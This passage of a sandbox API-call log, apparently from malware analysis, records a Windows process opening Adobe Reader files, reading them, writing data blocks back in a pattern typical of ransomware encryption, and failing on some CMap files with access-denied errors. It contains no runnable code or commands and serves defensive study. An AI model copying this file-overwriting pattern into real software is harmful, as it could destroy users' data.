lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0090.807] WriteFile (in: hFile=0x1ec, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0090.807] CloseHandle (hObject=0x1ec) returned 1 [0090.807] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\wow_helper.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\wow_helper.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0090.808] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.808] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x11f98 [0090.808] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.808] ReleaseMutex (hMutex=0x168) returned 1 [0090.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wow_helper.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wow_helper.exe", cchWideChar=14, lpMultiByteStr=0x1f7342c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wow_helper.exe", lpUsedDefaultChar=0x0) returned 14 [0090.808] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0090.812] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10f98 [0090.812] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea88b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.277] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10f98 [0092.277] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.279] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0092.279] WriteFile (in: hFile=0x1ec, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0092.279] CloseHandle (hObject=0x1ec) returned 1 [0092.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.280] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0092.280] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4090 [0092.280] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0092.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.280] ReleaseMutex (hMutex=0x168) returned 1 [0092.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeK.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeK.htm", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeK.htm", lpUsedDefaultChar=0x0) returned 11 [0092.281] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea88b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3090 [0092.376] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea88b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.385] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3090 [0092.385] WriteFile (in: hFile=0x1ec, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.385] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0092.385] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea88b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.385] CloseHandle (hObject=0x1ec) returned 1 [0092.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.386] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0092.386] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xbb27d0 [0092.386] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0092.386] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.386] ReleaseMutex (hMutex=0x168) returned 1 [0092.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHeitiStd-Regular.otf", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHeitiStd-Regular.otf", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeHeitiStd-Regular.otf", lpUsedDefaultChar=0x0) returned 25 [0092.386] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.501] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.516] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.527] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.542] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.585] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.595] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.605] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.614] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.624] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbb07d0 [0092.624] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2e9f278*=0x2000, lpOverlapped=0x0) returned 1 [0092.634] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbb07d0 [0092.640] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eef0000 [0092.652] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x2588, lpOverlapped=0x0) returned 1 [0092.652] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0092.652] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.653] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.653] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.653] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.655] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.655] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.655] VirtualFree (lpAddress=0x7eef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.659] CloseHandle (hObject=0x1ec) returned 1 [0092.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.659] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2", lpFilePart=0x2e9f690*="90ms-RKSJ-UCS2") returned 0x45 [0092.659] GetLastError () returned 0x5 [0092.659] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0092.660] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.660] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.660] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0092.660] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0092.660] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0092.660] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-ucs2")) returned 0x20 [0092.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.661] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V", lpFilePart=0x2e9f690*="Add-RKSJ-V") returned 0x41 [0092.661] GetLastError () returned 0x5 [0092.661] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0092.661] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.661] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.661] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0092.661] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0092.661] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0092.661] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-v")) returned 0x20 [0095.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-eten-b5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.645] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5", lpFilePart=0x2e9f690*="Adobe-CNS1-ETen-B5") returned 0x49 [0095.645] GetLastError () returned 0x5 [0095.646] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0095.646] LocalFree (hMem=0x69e2b0) returned 0x0 [0095.646] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0095.646] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0095.659] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0095.672] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0095.672] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-eten-b5")) returned 0x20 [0096.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3", lpFilePart=0x2e9f690*="Adobe-GB1-3") returned 0x42 [0096.316] GetLastError () returned 0x5 [0096.316] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.316] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.316] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.316] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.317] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.317] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.317] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-3")) returned 0x20 [0096.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2", lpFilePart=0x2e9f690*="Adobe-GB1-UCS2") returned 0x45 [0096.317] GetLastError () returned 0x5 [0096.317] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.318] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.318] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.318] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.318] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.318] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.318] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-ucs2")) returned 0x20 [0096.319] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90ms-rksj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.319] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ", lpFilePart=0x2e9f690*="Adobe-Japan1-90ms-RKSJ") returned 0x4d [0096.319] GetLastError () returned 0x5 [0096.319] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.319] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.319] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.319] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.320] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.320] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.320] GetFileAttributesW (lpFileName="C:\\Program Files 